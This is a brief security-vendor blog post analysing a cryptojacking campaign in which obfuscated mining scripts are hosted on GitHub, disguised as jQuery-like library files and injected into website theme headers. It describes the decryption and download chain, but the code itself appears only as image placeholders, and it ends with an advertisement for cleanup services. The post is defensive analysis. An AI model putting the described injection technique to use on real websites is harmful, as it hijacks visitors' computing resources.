Crypto Mining Malware on Popular Code Repositories

· Read in about 2 min · (293 Words)

Crypto Mining Malware on Popular Code Repositories | Quttera blog

Cryptocurrency mining malware is gaining popularity among hackers. Attackers are now using GitHub repositories and other well-known repositories for storing and serving the malicious code. On GitHub, the free accounts are being created to commit the obfuscated code and to use it in the injection later. The encrypted infection usually disguises itself as a legitimate jQuery or other familiar library files. It looks like in 2018 this new security threat - cryptojacking is here to stay. With the explosion of the cryptocurrency, it will become a significant part of the global web malware landscape. We expect that cyber-criminals will continue hijacking websites and visitors' systems to exploit them as the free power and computing resources.

Let's have a look at the code that was recently detected by ThreatSign website security monitoring and later appeared to be another cryptocurrency mining infection.

Malware Analysis

The common infection is placed in the themes header file:

Crypto Mining Malware on Popular Code Repositories | Quttera blog

Once decrypted, a connection to GitHub will take place to download a file:

Crypto Mining Malware on Popular Code Repositories | Quttera blog

The content of the downloaded file from GitHub:

MD5 : D7A539C0E2F1DAC800030CAB72C3A968

Crypto Mining Malware on Popular Code Repositories | Quttera blog

And once you follow the decryption routine to uncover the content of the file, it should look like this:

Crypto Mining Malware on Popular Code Repositories | Quttera blog

Notice on the script above, the first active line of the code (which hides inside a common JavaScript file) is the one that is responsible for the throttling of the visitor’s CPU for mining:

Crypto Mining Malware on Popular Code Repositories | Quttera blog

Is your website flagged for malware, blocked by the search engines or disabled by the host?

Quttera experts are at your service to clean up any malware from your sites and remove false-positives, blacklisting and other kinds of alerts by any security vendor and search engines. Just select from suitable ThreatSign! Anti-Malware Plan and get back online.

For other issues and help: Quttera's help-desk